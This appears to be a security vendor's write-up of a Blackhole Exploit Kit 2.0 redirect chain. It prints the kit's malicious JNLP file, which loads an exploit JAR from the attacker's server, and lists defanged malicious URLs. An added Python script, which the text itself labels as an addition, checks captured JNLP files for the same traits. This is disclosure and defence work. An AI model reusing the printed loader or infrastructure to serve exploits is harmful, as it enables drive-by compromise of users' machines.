According to http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/19247, Blackhole Exploit Kit 2.0 has infected many websites with pages named "*/linkendorse.html".
It often uses large spam mail campaigns to spread the malicious links!
AegisLab also collected many similar malicious links.
When you connect to these victim websites, they will redirect you to hxxp://onlinedatingblueprint.net/news/suspect-someplace.php
We can see "Redirecting to Complain details… Please wait…"; this sentence is a well-known Blackhole Exploit Kit pattern!
For more details, you can refer to this.
Then the landing page detects your browser and plugin information and redirects you to the next hop sites.
If your browser is vulnerable, you will download a JNLP file: hxxp://onlinedatingblueprint.net/news/suspect-someplace.php?jnlp=e4658ff1b1
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com">
  <information>
    <title>JNLP</title>
    <vendor>JNLP</vendor>
    <description>JNLP</description>
    <offline-allowed/>
  </information>
  <resources>
    <j2se version="1.6+" href="http://java.sun.com/products/autodl/j2se"/>
    <jar href="/news/suspect-someplace.php?tovx=wup&hld=mzhbvvdd" main="true"/>
  </resources>
  <applet-desc name="Jn" main-class="wh" width="1" height="1">
    <param value="true" name="__applet_ssv_validated"></param>
    <param name="val" value="Dyy"></param>
    <param name="prime" value="3Ojjto-8oeMVy8oA?-Ke3l8oywoeyjoe_ijiKi3e%ymit0e3-V%ew3D3x_.b6DO60Oh_O6oO6tRVeb1hO6CO6-O6qO6oO11O11O6AOh_O6ARtb6.RKeb8R0ob_"></param>
  </applet-desc>
</jnlp>
Otherwise, you will be redirected to a Google search for "linkedin".
The JNLP above fetches a JAR. The JAR file includes a Java exploit to execute a PE or PDF.
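A triage check a defender could run over captured JNLP responses, flagging three traits visible in the sample above: a jar resource served from a non-.jar path, a 1x1 applet, and the `__applet_ssv_validated` parameter. This is an added example, not code from the original post; the finding labels, the 2-pixel threshold and the function name are assumptions, and the embedded sample is constructed.

```python
import re
import xml.etree.ElementTree as ET

# Kit-generated JNLP often carries raw "&" in the jar href, which strict XML
# parsers reject; escape only ampersands that do not start an entity.
BARE_AMP = re.compile(r"&(?!(?:amp|lt|gt|quot|apos|#\d+|#x[0-9a-fA-F]+);)")

# Constructed sample with the same shape as the JNLP above; the path and
# parameter values are placeholders, not values from the post.
SAMPLE_JNLP = """<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com">
  <information><title>JNLP</title><vendor>JNLP</vendor></information>
  <resources>
    <j2se version="1.6+" href="http://java.sun.com/products/autodl/j2se"/>
    <jar href="/news/example.php?a=b&c=d" main="true"/>
  </resources>
  <applet-desc name="Jn" main-class="wh" width="1" height="1">
    <param value="true" name="__applet_ssv_validated"></param>
    <param name="prime" value="PLACEHOLDER"></param>
  </applet-desc>
</jnlp>"""


def triage_jnlp(text):
    """Return heuristic findings (hypothetical labels) for one JNLP document."""
    # Refuse DTDs so untrusted input cannot define entities for expansion.
    if "<!DOCTYPE" in text or "<!ENTITY" in text:
        raise ValueError("DTD/entity declarations refused in untrusted JNLP")
    root = ET.fromstring(BARE_AMP.sub("&amp;", text).encode("utf-8"))
    findings = []
    for jar in root.iter("jar"):
        href = jar.get("href", "")
        # A jar resource whose path is not *.jar (here a PHP endpoint).
        if not href.split("?", 1)[0].lower().endswith(".jar"):
            findings.append("jar-not-dot-jar: " + href)
    for applet in root.iter("applet-desc"):
        w, h = applet.get("width", ""), applet.get("height", "")
        # An applet too small to see; the 2-pixel limit is an assumption.
        if w.isdigit() and h.isdigit() and int(w) <= 2 and int(h) <= 2:
            findings.append("tiny-applet: %sx%s" % (w, h))
        for param in applet.iter("param"):
            if param.get("name") == "__applet_ssv_validated":
                findings.append("ssv-validated-param: " + param.get("value", ""))
    return findings


if __name__ == "__main__":
    for finding in triage_jnlp(SAMPLE_JNLP):
        print(finding)
```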
The final download site is:
hxxp://onlinedatingblueprint.net/news/suspect-someplace.php?cf=1l:1i:30:2w:1o&fe=32:1j:1l:1k:1n:33:33:1g:2w:1g&x=1f&nh=a&do=j
Detection rate in VirusTotal: 7/47
AegisLab WebGuard has blocked [D]onlinedatingblueprint.net; we urge our customers to keep their WebGuard signatures up to date.
[2013.06.07 update]
New: "*/natpay.html" leads to "hxxp://usforclosedhomes.net/news/walls_autumns-serial.php"
AegisLab WebGuard has also blocked [D]usforclosedhomes.net!